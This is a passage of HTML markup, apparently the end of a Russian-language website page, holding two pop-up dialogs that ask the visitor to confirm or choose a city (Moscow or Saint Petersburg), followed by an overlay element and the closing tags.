        <div class="pop-up-custom__title">Ваш город?</div>
        <div class="pop-up-custom__body">
            <a href="#" class="pop-up-custom__city">Москва</a>
            <div class="pop-up-custom__btns">
                <a href="#" class="pop-up-custom__btn pop-up-custom__btn--active">Да</a>
                <a href="#" class="pop-up-custom__btn pop-up-custom__btn--cancel">Нет</a>
            </div>
        </div>
    </div>
    
    <div class="pop-up pop-up-custom pop-up__change-city">
        <div class="close"></div>
        <div class="pop-up-custom__title">Выберите ваш город</div>
        <div class="pop-up-custom__body">
            <ul class="pop-up-custom-city-list">
                <li class="pop-up-custom-city-list__item">
                    <a href="#" class="pop-up-custom-city-list__link active">Москва</a>
                </li>
                <li class="pop-up-custom-city-list__item">
                    <a href="#" class="pop-up-custom-city-list__link">Санкт-Петербург</a>
                </li>
            </ul>
        </div>
    </div>
    
    <div class="overlay" ></div>
</body>
</html>